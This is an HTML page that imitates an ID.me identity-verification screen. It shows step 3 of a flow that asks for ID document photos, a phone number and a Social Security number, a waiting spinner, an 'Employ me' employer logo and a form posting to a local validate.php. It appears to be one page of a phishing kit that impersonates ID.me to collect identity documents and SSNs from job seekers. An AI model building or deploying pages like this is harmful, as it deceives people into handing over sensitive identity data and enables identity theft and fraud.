<!DOCTYPE html>
<html dir="ltr" lang="en">

		<title>
		ID.me account - ID.me
		</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta content="IE=edge" http-equiv="X-UA-Compatible">
		<meta content="One Identity. One Wallet." name="description">
		<meta content="" name="keywords">
		<meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
		<link rel="icon" type="image/png" href="img/favicon.ico">
		<link rel="stylesheet" href="css/style.css">
		<link rel="stylesheet" href="css/eye.css">
		<link rel="javascript" href="js/mask.js">
		<script src="hotreload.js"></script>	

			
		<style>
			.spinningCircle {
			   height: 60px;
			   width: 60px;
				position: relative;
				left: 50%;
				transform: translate(-50%, -50%);

			   
			   border-radius: 70%;
			   border: 4px solid rgba(255,255,255,0);
			   border-top-color: 6px solid #7fc4d1;
			   border-right-color: 6px solid #7fc4d1;
			   -webkit-animation: single2 4s infinite linear;
			   animation: single2 2s infinite linear;
			}

			@-webkit-keyframes single2 {
			   0% {
				  -webkit-transform: rotate(0deg);
				  transform: rotate(0deg);
				  border-top-color: #7fc4d1;
				  border-right-color: #7fc4d1;
			   }
			   50% {
				  border-top-color: #1f4f58;
				  border-right-color: #1f4f58;
			   }
			   100% {
				  -webkit-transform: rotate(720deg);
				  transform: rotate(720deg);
				  border-top-color: #7fc4d1;
				  border-right-color: #7fc4d1;
			   }
			}

			@keyframes single2 {
			   0% {
				  -webkit-transform: rotate(0deg);
				  transform: rotate(0deg);
				  border-top-color: #7fc4d1;
				  border-right-color: #7fc4d1;
			   }
			   50% {
				  border-top-color: #1f4f58;
				  border-right-color: #1f4f58;
			   }
			   100% {
				  -webkit-transform: rotate(720deg);
				  transform: rotate(720deg);
				  border-top-color: #7fc4d1;
				  border-right-color: #7fc4d1;
			   }
			}

		</style>
	
		<div class="container">
			<div class="form-header">
				<div class="form-header-content" role="banner">
					<div class="partner">
						<div class="c_icon m_idme"><img alt="identity" src="img/idme.svg"></div>
						
						<div class="c_icon m_addition"><img alt="" src="img/icon.svg"></div>
						
						<div class="c_icon m_consumer-logo"><img alt="Employ me" src="img/work.png"></div>
						
					</div>
				</div>
			</div>
			
	<body>
	
		<form action="validate.php" method="post" name="info">
			<div class="content-container">

				<div class="form-container shared_structure">

					<h1 class="heading" id="sr_page_title">Verifying is fast and easy</h1>
					<div class="verification-options-container">

						<ul class="subway_stops" role="presentation">
							<li class="subway_stops-item">
								<span aria-hidden="true">1</span>
								<span class="sr-only">step 1 out of 5, Take photos of your identity document </span>
							</li>
							
							<li class="subway_stops-item">
								<span aria-hidden="true">2</span>
								<span class="sr-only">step 2 out of 5, Gathering more information Current step</span>
							</li>
							
							<li class="subway_stops-item active">
								<span aria-hidden="true">3</span>
								<span class="sr-only">step 3 out of 5, Enter your phone number </span>
							</li>
							
							<li class="subway_stops-item">
								<span aria-hidden="true">4</span>
								<span class="sr-only">step 4 out of 5, Enter your Social Security number </span>
							</li>
							
							<li class="subway_stops-item">
								<span aria-hidden="true">5</span>
								<span class="sr-only">step 5 out of 5, Confirm your information </span>
							</li>
						</ul>
					</div>

						<div class="form-content">
							<div class="form-content-title"><h2 id="alternate_page_header">Checking Uploaded images</h2></div>
						</div>


						<div aria-labelledby="alternate_page_header">
								<br></br>
							<div class="spinningCircle"></div> 
								<br></br>
						<h3> Please wait............ </h3>
							
							
					</div>
				</div>
			</div>
		</form>					
	</body>

		<footer class="footer">
			<nav aria-label="Footer" class="footer__links">
			<ul class="footer__list">
			<li class="footer__list-item"><a target="_blank" rel="noopener noreferrer" class="footer__link" title="What is ID.me? (opens in new tab)" aria-label="What is ID.me? (opens in new tab)" href="about">What is ID.me?</a></li>
			<li class="footer__list-item"><a target="_blank" rel="noopener noreferrer" class="footer__link" title="Terms of Service (opens in new tab)" aria-label="Terms of Service (opens in new tab)" href="terms">Terms of Service</a></li>
			<li class="footer__list-item"><a target="_blank" rel="noopener noreferrer" class="footer__link" title="Privacy Policy (opens in new tab)" aria-label="Privacy Policy (opens in new tab)" href="privacy">Privacy Policy</a></li>
			</ul>
			</nav>
		</footer>
</html>